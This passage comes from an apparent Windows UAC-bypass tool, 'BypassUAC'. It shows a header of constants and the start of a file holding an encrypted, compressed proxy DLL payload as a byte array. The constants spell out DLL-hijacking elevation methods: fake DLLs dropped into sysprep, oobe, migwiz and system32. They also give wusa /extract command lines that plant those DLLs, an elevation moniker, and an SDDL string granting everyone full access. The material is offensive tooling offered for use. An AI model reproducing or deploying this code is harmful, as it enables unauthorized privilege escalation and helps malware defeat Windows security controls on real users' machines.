31 | #define T_IIS_TARGETDLL       L"SLC.dll"
32 | 
33 | //
34 | // Standard elevation methods.
35 | //
36 | #define M1W7_SOURCEDLL         L"%temp%\\CRYPTBASE.dll"
37 | #define M1W7_TARGETDIR         L"%systemroot%\\system32\\sysprep\\"
38 | #define M1W7_TARGETPROCESS     L"%systemroot%\\system32\\sysprep\\sysprep.exe"
39 | #define M1W8_SOURCEDLL         L"%temp%\\shcore.dll"
40 | #define M1WALL_SOURCEDLL       L"%temp%\\wdscore.dll"
41 | #define M1W7T_SOURCEDLL        L"%temp%\\ActionQueue.dll"
42 | #define M1W10_SOURCEDLL        L"%temp%\\dbgcore.dll"
43 | #define M1WALL_TARGETDIR       L"%systemroot%\\system32\\oobe\\"
44 | #define M1WALL_TARGETPROCESS   L"%systemroot%\\system32\\oobe\\setupsqm.exe"
45 | #define IFILEOP_ELEMONIKER     L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}"
46 | #define SYSTEMROOTDIR          L"%systemroot%\\system32\\"
47 | #define WBEMDIR                L"%systemroot%\\system32\\wbem"
48 | #define TEMPDIR                L"%temp%\\"
49 | 
50 | #define T_UACKEY                    L"MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system"
51 | #define T_SDDL_ALL_FOR_EVERYONE     L"D:(A;;GA;;;WD)"
52 | 
53 | //default fake msu cabinet name
54 | #define T_MSUPACKAGE_NAME           L"%temp%\\ellocnak.msu"
55 | 
56 | #define METHOD_MIGWIZ_SOURCEDLL     L"%temp%\\wdscore.dll"
57 | #define METHOD_MIGWIZ_CMDLINE       L"/c wusa %ws /extract:%%windir%%\\system32\\migwiz"
58 | #define METHOD_MIGWIZ_TARGETAPP     L"%systemroot%\\system32\\migwiz\\migwiz.exe"
59 | 
60 | #define METHOD_SQLSRV_SOURCEDLL     L"%temp%\\ntwdblib.dll"
61 | #define METHOD_SQLSRV_CMDLINE       L"/c wusa %ws /extract:%%windir%%\\system32"
62 | #define METHOD_SQLSRV_TARGETAPP     L"%systemroot%\\system32\\cliconfg.exe"
63 | 
64 | 
65 | #define PROGRAMTITLE TEXT("#BypassUAC#")
66 | #define WOW64STRING TEXT("Apparently it seems you are running under WOW64.\n\rThis is not supported, run x64 version of this tool.")
67 | #define WOW64WIN32ONLY TEXT("This method only works with x86-32 Windows or from Wow64")
68 | #define WIN64ONLY TEXT("Thos method only works with x86-64 Windows")
69 | #define LAZYWOW64UNSUPPORTED TEXT("Use 32 bit version of this tool on 32 bit OS version")
70 | #define OSTOOOLD TEXT("This method require Window 7 and above")
71 | #define UACFIX TEXT("This method fixed/unavailable in the current version of Windows, do you still want to continue?")
72 | #define RESULTOK TEXT("Injeact success!")
73 | #define RESULTFAIL TEXT("Something went wrong")
74 | #define T_AKAGI_KEY    L"Software\\bypassuac"
75 | #define T_AKAGI_PARAM  L"uac_is_disabled"
76 | 
77 | #define T_KERNEL32 L"kernel32.dll"
78 | #define T_OLE32    L"ole32.dll"
79 | #define T_SHELL32  L"shell32.dll"
80 | 


--------------------------------------------------------------------------------
/BypassUAC/fubuki32comp.h:
--------------------------------------------------------------------------------
  1 | /*******************************************************************************
  2 | *
  3 | *  (C) COPYRIGHT AUTHORS, 2015 - 2016
  4 | *
  5 | *  TITLE:       FUBUKI32COMP.H
  6 | *
  7 | *  VERSION:     2.00
  8 | *
  9 | *  DATE:        14 Nov 2015
 10 | *
 11 | *  Encrypted and compressed Fubuki32 proxy dll.
 12 | *
 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
 16 | * PARTICULAR PURPOSE.
 17 | *
 18 | *******************************************************************************/
 19 | #pragma once
 20 | 
 21 | static const unsigned char Fubuki32Comp[3399] = {
 22 | 	0x32, 0x7E, 0xC9, 0x93, 0x53, 0xF4, 0x99, 0x7E, 0x3C, 0x5C, 0x99, 0x30, 0x67, 0xCE, 0x9D, 0xB8,
 23 | 	0x70, 0xE8, 0xE1, 0x5C, 0xB8, 0x8E, 0x1C, 0x80, 0x70, 0xD8, 0xED, 0x80, 0x13, 0x46, 0x08, 0x21,
 24 | 	0x2B, 0x54, 0x29, 0x93, 0x56, 0x42, 0x86, 0x33, 0xDC, 0xC2, 0x99, 0x87, 0x6E, 0x03, 0xBC, 0x82,
 25 | 	0x74, 0xE9, 0x9D, 0x6E, 0x66, 0xDA, 0x74, 0x51, 0x03, 0xE0, 0xE0, 0xF1, 0x71, 0x69, 0x6B, 0x6B,
 26 | 	0x53, 0x09, 0xC9, 0xB3, 0x45, 0x2D, 0xF7, 0x5D, 0x09, 0xB8, 0xB9, 0x33, 0x05, 0xAB, 0xBD, 0x48,
 27 | 	0x01, 0x86, 0xF1, 0xCA, 0x47, 0xE0, 0x3C, 0x7C, 0x3F, 0xB3, 0xE0, 0xEC, 0x6C, 0x86, 0x68, 0x7C,
 28 | 	0x1C, 0x69, 0xC4, 0x99, 0x02, 0x48, 0x29, 0x33, 0x85, 0xED, 0x98, 0x8A, 0xC0, 0x8E, 0xF2, 0xD0,
 29 | 	0x35, 0xED, 0xD2, 0xD9, 0xF8, 0x2A, 0xF6, 0x9A, 0x72, 0xEF, 0xAE, 0x85, 0xE9, 0xAC, 0x0C, 0x1E,
 30 | 	0xEE, 0x7F, 0xAE, 0x78, 0x8B, 0xDD, 0x9B, 0x34, 0x09, 0x27, 0x3F, 0x31, 0x60, 0x5E, 0x77, 0x3B,
 31 | 	0x73, 0x60, 0x76, 0xE3, 0xBF, 0x8C, 0x1B, 0xE4, 0x6B, 0x8D, 0xC2, 0x96, 0x73, 0x54, 0x65, 0x7A,
 32 | 	0x5A, 0x65, 0x8A, 0x97, 0x70, 0x4A, 0x9F, 0x63, 0x66, 0x89, 0x99, 0x33, 0x2B, 0xCF, 0x99, 0x3A,
 33 | 	0xC4, 0xE0, 0x3B, 0x9D, 0x11, 0x8B, 0x08, 0xD8, 0x70, 0xE2, 0xE1, 0xA9, 0x08, 0x07, 0x02, 0x1A,
 34 | 	0xC6, 0x76, 0x4A, 0x99, 0x67, 0x5D, 0x8C, 0xB3, 0x65, 0xDC, 0x19, 0x32, 0x47, 0x4E, 0x9C, 0x3A,
 35 | 	0x74, 0xF8, 0x50, 0x23, 0x47, 0x8E, 0x1C, 0x3A, 0x70, 0xE0, 0xC6, 0x81, 0x04, 0x9D, 0x89, 0x18,
 36 | 	0xB0, 0x68, 0x99, 0x13, 0x24, 0x4C, 0x0F, 0xCB, 0x4A, 0xCD, 0x96, 0xCF, 0x27, 0xCB, 0x9C, 0x2F,
 37 | 	0xF6, 0xFD, 0xD0, 0xA1, 0xC6, 0x91, 0x1C, 0x37, 0x71, 0xE3, 0xE0, 0xE1, 0x22, 0x06, 0x0C, 0x37,
 38 | 	0x32, 0x78, 0xA5, 0xBB, 0x2E, 0x4C, 0x99, 0x0F, 0xE6, 0xC5, 0x99, 0x03, 0x67, 0xCE, 0xE3, 0xDA,
 39 | 	0x75, 0x5A, 0x50, 0xA6, 0xCE, 0x8F, 0x1C, 0x8C, 0xD1, 0x55, 0xCD, 0x9A, 0x03, 0x09, 0x8C, 0x4A,
 40 | 	0xB0, 0x4F, 0xC7, 0x9F, 0x25, 0x44, 0xB7, 0x47, 0x03, 0xB4, 0x63, 0x47, 0x67, 0xCB, 0x3F, 0xBA,
 41 | 	0x15, 0x6A, 0x9E, 0x22, 0x7A, 0x02, 0x23, 0x38, 0x51, 0xE0, 0xA0, 0xAF, 0x71, 0x62, 0x6D, 0x6D,
 42 | 	0x53, 0x64, 0x51, 0x93, 0xF8, 0x45, 0x99, 0x38, 0x66, 0xC8, 0x99, 0x39, 0xA7, 0xCF, 0x93, 0x32,
 43 | 	0xB4, 0xE8, 0x59, 0xA3, 0xC6, 0xA6, 0x32, 0x4A, 0x03, 0x92, 0x3E, 0xE2, 0xC3, 0x02, 0xCE, 0x29,
 44 | 	0xF2, 0x56, 0xCB, 0xD5, 0xE2, 0x02, 0x1C, 0x39, 0xA5, 0xC5, 0x01, 0x56, 0x0B, 0xA1, 0x9D, 0x30,
 45 | 	0xB4, 0xEA, 0xD1, 0xA3, 0x46, 0x8F, 0xC1, 0xF9, 0x6F, 0xF8, 0x85, 0x89, 0xC0, 0x07, 0x8C, 0x1C,
 46 | 	0x70, 0x2F, 0xCD, 0xEC, 0x25, 0x53, 0xE6, 0x23, 0x19, 0xDC, 0xE6, 0x23, 0x18, 0xDE, 0xF0, 0x2A,
 47 | 	0xB7, 0xBD, 0x5A, 0xA3, 0xAB, 0x0D, 0xF0, 0x5C, 0x23, 0xB6, 0x97, 0x0C, 0x83, 0x43, 0xF0, 0x2A,
 48 | 	0xE9, 0x34, 0xA1, 0x8A, 0x86, 0x12, 0x99, 0x60, 0x0E, 0x8C, 0xB9, 0x33, 0x77, 0xA6, 0x9C, 0x3A,
 49 | 	0x74, 0xE8, 0x51, 0x28, 0xBC, 0x07, 0x41, 0xC4, 0x30, 0x69, 0x9D, 0x79, 0xFC, 0x13, 0x08, 0x59,
 50 | 	0x30, 0xE1, 0xD9, 0x53, 0x29, 0xC9, 0x6A, 0x73, 0x6A, 0xF5, 0xC4, 0xCF, 0xEF, 0xC1, 0x19, 0xC3,
 51 | 	0x74, 0xE9, 0x5A, 0x96, 0x4F, 0x4E, 0x1E, 0x38, 0xFD, 0xA5, 0x38, 0xD1, 0x50, 0x55, 0x5F, 0x71,
 52 | 	0xB0, 0x04, 0xA9, 0x92, 0xD9, 0x39, 0x65, 0xCC, 0xB0, 0x2D, 0x9D, 0x31, 0xAC, 0x0F, 0x9E, 0x7F,
 53 | 	0x8C, 0xA8, 0x81, 0xC9, 0x4F, 0x86, 0xE3, 0x2D, 0x40, 0xC0, 0xC3, 0xD1, 0xFC, 0x13, 0x18, 0x18,
 54 | 	0xF2, 0x64, 0x42, 0x4B, 0xA3, 0x97, 0x96, 0xB7, 0xCB, 0xDF, 0x39, 0x30, 0xA5, 0xC8, 0xCA, 0x6D,
 55 | 	0xBD, 0xEE, 0xA4, 0xC8, 0xCC, 0xAA, 0x29, 0x1C, 0xF0, 0xE4, 0xA8, 0xF9, 0x83, 0x06, 0xF3, 0xCF,
 56 | 	0x32, 0x37, 0x36, 0x45, 0x4C, 0x08, 0xC3, 0xB8, 0xAC, 0xDC, 0x14, 0x76, 0xC7, 0x08, 0x5D, 0x73,
 57 | 	0xF7, 0x01, 0xD0, 0xA3, 0x32, 0x79, 0x76, 0x28, 0x29, 0x6D, 0x85, 0x69, 0xA0, 0xC0, 0x0D, 0x59,
 58 | 	0x31, 0xED, 0x9C, 0x33, 0x46, 0x47, 0xAD, 0x13, 0x60, 0x49, 0x99, 0x30, 0x37, 0xCE, 0x9F, 0x6A,
 59 | 	0x47, 0x28, 0x81, 0xA1, 0x47, 0x84, 0x4F, 0xD8, 0x72, 0xC0, 0x20, 0x83, 0x88, 0xFE, 0x89, 0xE6,
 60 | 	0x32, 0x10, 0xD9, 0x6C, 0x53, 0xA4, 0x12, 0x06, 0x7A, 0x8D, 0x59, 0x32, 0x98, 0x18, 0x62, 0x4F,
 61 | 	0x98, 0x48, 0xDA, 0xC9, 0xDD, 0x8E, 0x3A, 0x2B, 0x5C, 0x21, 0xC2, 0xC1, 0x14, 0x13, 0x00, 0x19,
 62 | 	0x33, 0x74, 0x4A, 0xF6, 0xDA, 0x4C, 0xDE, 0x13, 0x99, 0xD9, 0x99, 0xF2, 0x06, 0xCC, 0xE0, 0xC6,
 63 | 	0x74, 0x9C, 0xD8, 0x02, 0x5C, 0xCC, 0x18, 0x38, 0xFB, 0x27, 0x9F, 0xDF, 0x58, 0x8D, 0xE9, 0x44,
 64 | 	0x73, 0x86, 0xEE, 0x77, 0xDE, 0xCD, 0x75, 0x4B, 0xE6, 0xB1, 0xAA, 0x33, 0xA7, 0x8E, 0xCE, 0x6C,
 65 | 	0x4D, 0xAD, 0xDD, 0xAC, 0x63, 0x0B, 0x23, 0x58, 0x57, 0x88, 0x60, 0x41, 0x05, 0xF9, 0x19, 0x18,
 66 | 	0xF3, 0x7D, 0x21, 0x05, 0xD8, 0xB3, 0x66, 0x00, 0xBD, 0xC1, 0x58, 0x11, 0x79, 0xEE, 0x9E, 0x59,
 67 | 	0x6E, 0xAC, 0xF5, 0xBB, 0xCF, 0x9A, 0x04, 0x78, 0x11, 0xFA, 0x38, 0xE0, 0x19, 0x42, 0x28, 0x11,
 68 | 	0xB7, 0xA1, 0xC8, 0x1E, 0x66, 0x4F, 0x10, 0x67, 0x42, 0xD4, 0x3D, 0x29, 0x4B, 0x77, 0x97, 0xBA,
 69 | 	0x1C, 0x88, 0xD3, 0xC3, 0xA2, 0x8D, 0xA2, 0x3C, 0x33, 0x60, 0xC8, 0x80, 0x01, 0x50, 0x5C, 0x71,
 70 | 	0xC6, 0xE6, 0xC5, 0xBB, 0x35, 0xEC, 0x99, 0x93, 0x6D, 0x48, 0x59, 0xF3, 0x4D, 0xF5, 0x5B, 0x35,
 71 | 	0x66, 0x6B, 0x10, 0x1B, 0xFE, 0x9E, 0xFC, 0x45, 0xFD, 0x64, 0xE4, 0x87, 0x73, 0xA6, 0x0B, 0x3C,
 72 | 	0x35, 0x02, 0x42, 0xD7, 0x02, 0x2C, 0x9D, 0xBE, 0xEA, 0xAE, 0x9B, 0x55, 0xE2, 0x0E, 0xE9, 0x26,
 73 | 	0x74, 0xE7, 0x66, 0x53, 0xCA, 0xDA, 0x38, 0x58, 0xFB, 0xE0, 0x01, 0xAA, 0xD3, 0x60, 0x85, 0x28,
 74 | 	0xB1, 0xA5, 0x49, 0x91, 0x29, 0xFB, 0x9D, 0x39, 0xED, 0x3C, 0xF9, 0x30, 0xE7, 0xBB, 0x72, 0x09,
 75 | 	0xB4, 0x8E, 0x58, 0xA2, 0xC2, 0x8B, 0x0E, 0x01, 0x73, 0xE9, 0xB4, 0x89, 0x63, 0x02, 0x6A, 0x20,
 76 | 	0x2B, 0x64, 0xBC, 0x6B, 0x4C, 0x2F, 0x23, 0x03, 0x47, 0xCC, 0x09, 0x23, 0x39, 0xE5, 0x4C, 0x3A,
 77 | 	0x73, 0x65, 0x98, 0xAC, 0x40, 0x5B, 0x1C, 0x22, 0x20, 0x60, 0xD4, 0x9D, 0x82, 0x06, 0x64, 0xF8,
 78 | 	0x71, 0x24, 0x8D, 0x8E, 0xE6, 0x5D, 0x0D, 0xF3, 0x77, 0x08, 0xAB, 0x33, 0x77, 0xDC, 0x62, 0x4E,
 79 | 	0x30, 0xCC, 0xD9, 0x05, 0x75, 0xFA, 0x38, 0x34, 0xF1, 0xDE, 0xD5, 0x67, 0x1B, 0xC6, 0x15, 0xDB,
 80 | 	0x19, 0xA6, 0xC5, 0x93, 0x3C, 0x13, 0x99, 0x0C, 0x62, 0x33, 0xA6, 0x37, 0x58, 0xCA, 0xA2, 0x3E,
 81 | 	0x4B, 0xEC, 0xEE, 0xA7, 0x78, 0x8A, 0x23, 0x3C, 0x4F, 0xE4, 0x81, 0xA4, 0x07, 0xB4, 0x25, 0x19,
 82 | 	0x32, 0xC6, 0xF9, 0x93, 0xA8, 0xE1, 0xA9, 0x33, 0xA4, 0xFC, 0x99, 0x42, 0x66, 0x8C, 0xED, 0x3A,
 83 | 	0x3A, 0xD8, 0xD1, 0x09, 0x73, 0xBE, 0x1C, 0x56, 0x40, 0xE0, 0xDE, 0xB1, 0x03, 0x04, 0x3C, 0x19,
 84 | 	0x58, 0x92, 0x79, 0xFF, 0x7A, 0x3C, 0x99, 0xD7, 0x16, 0xCC, 0x6C, 0x30, 0x34, 0xCE, 0x9D, 0x55,
 85 | 	0x74, 0x8E, 0xD1, 0xD7, 0x47, 0xF9, 0x1C, 0x38, 0x11, 0xE0, 0xB2, 0x81, 0x66, 0x06, 0x50, 0x09,
 86 | 	0x32, 0x25, 0xC9, 0xF8, 0x96, 0x4C, 0xFE, 0x33, 0x0F, 0x99, 0xBB, 0x31, 0x2B, 0x3E, 0x9C, 0x4C,
 87 | 	0x04, 0xE9, 0x9D, 0x93, 0x47, 0xFA, 0x01, 0x48, 0x72, 0x85, 0x90, 0x83, 0x82, 0x07, 0x5B, 0x1B,
 88 | 	0x12, 0x64, 0xA5, 0x96, 0x9E, 0x4D, 0xB9, 0xE3, 0x62, 0xA3, 0x99, 0x46, 0x67, 0xA0, 0x89, 0x3A,
 89 | 	0x10, 0x1A, 0xD2, 0xF6, 0xB7, 0x8A, 0x5F, 0x38, 0x3D, 0xA5, 0xD0, 0x83, 0x23, 0x16, 0x09, 0x77,
 90 | 	0x32, 0x0E, 0x59, 0x93, 0x45, 0x4D, 0xEB, 0x37, 0x02, 0xCC, 0xB5, 0x33, 0x47, 0xCE, 0xDB, 0x6F,
 91 | 	0xC4, 0xEA, 0xB3, 0x93, 0x47, 0xE5, 0xCC, 0x39, 0x50, 0x90, 0xC7, 0xF5, 0x16, 0x36, 0x0D, 0x60,
 92 | 	0x02, 0x63, 0xBC, 0xE3, 0x20, 0x6C, 0x99, 0x40, 0x37, 0x1C, 0x9B, 0x41, 0x67, 0xB8, 0x2D, 0x3B,
 93 | 	0x17, 0x78, 0xD1, 0x8D, 0x13, 0x8E, 0x11, 0xDA, 0x1D, 0xC5, 0xB0, 0x80, 0x7A, 0x36, 0x0C, 0x6D,
 94 | 	0x27, 0x54, 0xC8, 0xFE, 0x56, 0x4E, 0xF6, 0xC3, 0x64, 0xB8, 0x99, 0x16, 0xEE, 0x7E, 0x96, 0x49,
 95 | 	0x74, 0x9F, 0xD0, 0x90, 0x47, 0xBC, 0x0C, 0x39, 0xD3, 0xA2, 0xC8, 0xC9, 0x03, 0x65, 0x0C, 0x74,
 96 | 	0xA2, 0x6D, 0xE7, 0x03, 0x25, 0x72, 0xE1, 0x03, 0x66, 0x11, 0x98, 0xCC, 0x67, 0xDF, 0x9C, 0x8F,
 97 | 	0xF3, 0x94, 0xF2, 0x0F, 0x47, 0x8E, 0x9C, 0x03, 0x00, 0xE5, 0xC0, 0xB3, 0x03, 0x8E, 0x3C, 0x9B,
 98 | 	0x92, 0x34, 0xEB, 0x93, 0x26, 0x54, 0xE9, 0x32, 0x66, 0x8D, 0x1A, 0xCC, 0x58, 0xCE, 0x7F, 0xBF,
 99 | 	0xCB, 0xE9, 0x81, 0xA6, 0xF8, 0x8C, 0xA3, 0x3A, 0x4F, 0xE2, 0xFF, 0x83, 0x5C, 0x39, 0x0E, 0x26,
100 | 	0x30, 0x5B, 0xCB, 0xAC, 0x24, 0x78, 0x9B, 0xBA, 0xD6, 0xC0, 0x39, 0x66, 0x57, 0xCE, 0x2B, 0x0A,
101 | 	0x74, 0x28, 0xE1, 0xA3, 0x8D, 0xBE, 0x1C, 0xDD, 0x25, 0xD0, 0xC0, 0x80, 0x03, 0x99, 0x10, 0x29,
102 | 	0x32, 0x4B, 0xF9, 0x93, 0x62, 0x19, 0xA9, 0x33, 0x30, 0xFC, 0x99, 0x59, 0x57, 0xCE, 0xE2, 0x0A,
103 | 	0x74, 0x78, 0x84, 0x93, 0x47, 0x29, 0x2C, 0x38, 0xC8, 0xD0, 0xC0, 0x53, 0x33, 0x06, 0xE4, 0x1A,
104 | 	0x02, 0x64, 0x29, 0x8B, 0x26, 0x5A, 0xBC, 0x33, 0x66, 0xE7, 0xCC, 0x03, 0x67, 0xF6, 0xAD, 0x3A,
105 | 	0x3A, 0xD8, 0xD1, 0xC0, 0x77, 0x8E, 0x62, 0x6D, 0x40, 0xE0, 0x52, 0xB1, 0x03, 0xAE, 0x3C, 0x19,
106 | 	0x88, 0x54, 0xC9, 0x43, 0x33, 0x7C, 0x99, 0xD2, 0x56, 0xCC, 0x6A, 0x03, 0x67, 0xC7, 0xBB, 0x3A,
107 | 	0x20, 0xE8, 0xCB, 0x93, 0x47, 0xA6, 0x2C, 0x38, 0x4D, 0xD0, 0xC0, 0xD8, 0x56, 0x36, 0x0C, 0x75,
108 | 	0x02, 0x64, 0x4D, 0xA3, 0x26, 0xDB, 0xA9, 0x33, 0xD4, 0x99, 0xA9, 0x33, 0xA1, 0xFE, 0x9D, 0xE1,
109 | 	0x44, 0xE8, 0x27, 0x93, 0x47, 0x9E, 0x4C, 0x1F, 0x70, 0xE0, 0xDC, 0xB1, 0x03, 0x34, 0x3C, 0x19,
110 | 	0x72, 0xB1, 0xF9, 0x93, 0x7D, 0x7C, 0x99, 0x5E, 0x56, 0xCC, 0x18, 0x03, 0x67, 0x5F, 0x87, 0x18,
111 | 	0x76, 0x78, 0x60, 0xA7, 0x47, 0x8B, 0xBC, 0xB6, 0x77, 0xE0, 0x48, 0x89, 0x03, 0x0F, 0xBC, 0x3A,
112 | 	0x39, 0x64, 0xC5, 0xA3, 0x02, 0x44, 0x97, 0x33, 0x69, 0xEC, 0x80, 0x22, 0x67, 0xDC, 0x9D, 0x3A,
113 | 	0x67, 0xE8, 0xC5, 0xA3, 0x52, 0x8E, 0x0A, 0x38, 0x70, 0xF7, 0xC0, 0x99, 0x03, 0x1F, 0x0C, 0x03,
114 | 	0x32, 0x64, 0xD2, 0x93, 0x3A, 0x4C, 0x84, 0x33, 0x78, 0xCC, 0x9B, 0x2C, 0x37, 0xE6, 0xBC, 0x3A,
115 | 	0x56, 0xE8, 0xF2, 0xA3, 0x45, 0xAA, 0x9C, 0x34, 0x56, 0xE0, 0xE7, 0x81, 0x2B, 0x06, 0x2C, 0x30,
116 | 	0x32, 0x4E, 0xC9, 0xB8, 0x16, 0x67, 0xB4, 0x33, 0x6E, 0xE2, 0x99, 0x1C, 0x87, 0x6E, 0xAC, 0x3A,
117 | 	0x32, 0x9D, 0xD1, 0xC1, 0x32, 0xE5, 0x75, 0x0B, 0x42, 0xCE, 0xA4, 0x81, 0x6F, 0x6A, 0x0C, 0x5A,
118 | 	0x53, 0x08, 0xA5, 0xDD, 0x26, 0x38, 0xC9, 0x5C, 0x11, 0xA9, 0xEB, 0x7A, 0x09, 0xCE, 0xFB, 0x55,
119 | 	0x06, 0x85, 0xB0, 0xD7, 0x2E, 0xE1, 0x1C, 0x56, 0x70, 0xA3, 0xAF, 0xEF, 0x70, 0x72, 0x7E, 0x19,
120 | 	0x47, 0x07, 0xBD, 0xC3, 0x47, 0x3E, 0xED, 0x5A, 0x66, 0xAD, 0xF5, 0x7E, 0x14, 0xA9, 0xCB, 0x6D,
121 | 	0x74, 0xE8, 0x92, 0xD1, 0x22, 0xEF, 0x68, 0x5D, 0x25, 0x92, 0xC0, 0xE8, 0x03, 0x45, 0x79, 0x6B,
122 | 	0x40, 0x01, 0xA7, 0x93, 0x52, 0x05, 0xC9, 0x33, 0x22, 0xA9, 0xEF, 0x7C, 0xEB, 0xAC, 0xF7, 0xA9,
123 | 	0x75, 0x58, 0xD1, 0xCA, 0x24, 0xEB, 0x6D, 0x3C, 0xE0, 0xAC, 0xA9, 0xF2, 0x77, 0xA2, 0x0D, 0x5D,
124 | 	0x57, 0xF4, 0xCD, 0x9F, 0x49, 0x35, 0x26, 0x32, 0x06, 0xCF, 0xDC, 0x5D, 0x12, 0xA3, 0x9C, 0xBF,
125 | 	0x75, 0x9C, 0xB4, 0xD1, 0x21, 0xEF, 0x7F, 0x5D, 0x72, 0x93, 0xA4, 0x82, 0x44, 0x63, 0x78, 0x5A,
126 | 	0x5E, 0x05, 0xC5, 0xE0, 0x55, 0xAC, 0x98, 0x16, 0x67, 0x83, 0xE9, 0x56, 0x09, 0xCF, 0x48, 0x38,
127 | 	0x12, 0x87, 0xD1, 0xE7, 0x2B, 0xE2, 0x4E, 0x3C, 0x15, 0x87, 0x40, 0x87, 0x66, 0x74, 0x5F, 0x7C,
128 | 	0x40, 0x64, 0xBF, 0xF6, 0x54, 0x4C, 0xDE, 0x56, 0x08, 0xA9, 0x8B, 0x41, 0x77, 0xC4, 0xDC, 0x59,
129 | 	0x35, 0xE4, 0x80, 0xD6, 0x22, 0x8E, 0x69, 0x5D, 0x70, 0xAE, 0xA5, 0xF5, 0x42, 0x76, 0x0C, 0x70,
130 | 	0x70, 0x11, 0xAF, 0xF5, 0x43, 0x3E, 0xD8, 0xBD, 0x0A, 0x8C, 0x3B, 0xC3, 0x66, 0x84, 0x9C, 0x7C,
131 | 	0x06, 0x8D, 0x8A, 0xA1, 0x63, 0xDC, 0x79, 0x08, 0x61, 0x8F, 0xA3, 0xFC, 0x01, 0x55, 0x65, 0x1B,
132 | 	0x48, 0x16, 0xCB, 0xC1, 0x43, 0x21, 0xF6, 0x47, 0x03, 0xEC, 0xDA, 0x5C, 0x0A, 0xBE, 0xE8, 0x1A,
133 | 	0x7F, 0xBB, 0xA4, 0xE3, 0x37, 0xFE, 0x73, 0x4A, 0x04, 0x93, 0xE1, 0x84, 0x62, 0x8E, 0x7C, 0x70,
134 | 	0x42, 0xEB, 0xCF, 0xE3, 0x6F, 0x3F, 0x5C, 0x31, 0x66, 0x82, 0xF8, 0x5E, 0x02, 0x98, 0xFC, 0x56,
135 | 	0x1D, 0xEE, 0xB5, 0x72, 0x45, 0xFE, 0x1D, 0x7C, 0x1F, 0x8D, 0xA1, 0xE8, 0x81, 0x68, 0x51, 0x18,
136 | 	0x75, 0x16, 0xA6, 0xE6, 0x56, 0x01, 0x98, 0x3C, 0x35, 0xCB, 0xED, 0x30, 0xA4, 0xCE, 0xB0, 0x38,
137 | 	0x27, 0x80, 0xB0, 0xD1, 0xA5, 0xEB, 0x51, 0x39, 0x25, 0x8E, 0xA3, 0x5E, 0x04, 0x36, 0x1D, 0xC9,
138 | 	0x35, 0x34, 0x9C, 0xE0, 0x43, 0x3E, 0x72, 0x31, 0x11, 0xAD, 0x82, 0x70, 0xA7, 0xAF, 0xF3, 0x55,
139 | 	0x1A, 0x81, 0xB2, 0xC3, 0x4D, 0x7D, 0x12, 0x9A, 0x00, 0xB2, 0xC1, 0xD5, 0x71, 0x67, 0x1C, 0x0F,
140 | 	0x41, 0x76, 0xD9, 0x6F, 0x56, 0x3B, 0xF8, 0x30, 0x19, 0xCE, 0xCB, 0x32, 0x17, 0xDF, 0xFD, 0x32,
141 | 	0xF6, 0xE2, 0xD6, 0xC1, 0x45, 0x7C, 0x12, 0x8C, 0x64, 0x90, 0xB7, 0xD1, 0x62, 0x72, 0x12, 0x71,
142 | 	0xBD, 0x67, 0x9B, 0x92, 0xAF, 0x4F, 0x98, 0x32, 0x32, 0xB5, 0xE9, 0x2F, 0x02, 0xCE, 0x1F, 0x13,
143 | 	0xD4, 0xC8, 0xC0, 0xBE, 0x31, 0xEB, 0x4F, 0x28, 0x13, 0x88, 0xA5, 0xEC, 0x43, 0x07, 0x7E, 0x70,
144 | 	0x44, 0xC5, 0xD9, 0x96, 0x65, 0x23, 0xD0, 0x5D, 0x76, 0xD4, 0xF7, 0xB3, 0x45, 0xEE, 0xF2, 0x57,
145 | 	0x16, 0x81, 0xBF, 0x21, 0x6E, 0xDE, 0x6E, 0x72, 0x1F, 0xD0, 0xE4, 0xF2, 0x1A, 0x26, 0x5F, 0x55,
146 | 	0x32, 0x60, 0x9E, 0xD3, 0x4F, 0x22, 0xFD, 0x5C, 0x11, 0xBF, 0xA0, 0x1D, 0x30, 0xDE, 0xF9, 0x49,
147 | 	0x35, 0x8A, 0x61, 0xB8, 0x05, 0xE2, 0x7D, 0x38, 0x13, 0x8B, 0xA2, 0xEE, 0x62, 0x74, 0x68, 0x19,
148 | 	0xD3, 0x4B, 0xC8, 0xDA, 0x52, 0x29, 0xF4, 0x62, 0x4C, 0x6D, 0x98, 0x70, 0x49, 0xC1, 0x76, 0x38,
149 | 	0xA0, 0xC5, 0x9A, 0xA2, 0x46, 0x8D, 0x5A, 0x51, 0x02, 0x93, 0x7A, 0xF5, 0x64, 0x07, 0x45, 0x69,
150 | 	0x36, 0x55, 0xCD, 0x32, 0x27, 0x02, 0xA9, 0xE1, 0x9D, 0x53, 0x98, 0x42, 0x4F, 0x8A, 0xDC, 0xEB,
151 | 	0x34, 0xE0, 0xD1, 0xA8, 0x40, 0x8C, 0x0C, 0x2C, 0x93, 0x90, 0xEC, 0xD1, 0x02, 0x4F, 0x62, 0x70,
152 | 	0x83, 0x5C, 0xB8, 0xBB, 0xF7, 0x4C, 0x99, 0x40, 0x22, 0xA5, 0xF8, 0x54, 0x09, 0xA1, 0xEE, 0x3A,
153 | 	0x00, 0x81, 0xB2, 0xEE, 0x28, 0xEA, 0x79, 0x7D, 0xD0, 0x8E, 0xA1, 0xE3, 0x6F, 0x63, 0x3E, 0x15,
154 | 	0x61, 0x54, 0xE6, 0x91, 0x55, 0x9C, 0x84, 0x47, 0x20, 0xA0, 0xF8, 0x54, 0x14, 0xCD, 0xFC, 0x3D,
155 | 	0x64, 0xE9, 0xA4, 0xD3, 0x0B, 0xE1, 0x7B, 0x75, 0xF0, 0x85, 0xB3, 0xF2, 0x62, 0x61, 0x69, 0x4E,
156 | 	0x03, 0x65, 0x09, 0xC7, 0x43, 0x3E, 0xF4, 0x5A, 0x08, 0x6D, 0x80, 0xE2, 0x05, 0xF1, 0xA2, 0x3A,
157 | 	0x6B, 0xE9, 0xCE, 0xA2, 0x58, 0x8F, 0x03, 0x39, 0x6F, 0xE1, 0xC0, 0x81, 0xCB, 0xB2, 0x1E, 0x19,
158 | 	0x5A, 0x64, 0x75, 0xBB, 0x21, 0x94, 0x19, 0x1A, 0x66, 0x8C, 0x99, 0x27, 0x47, 0xCE, 0x9D, 0x92,
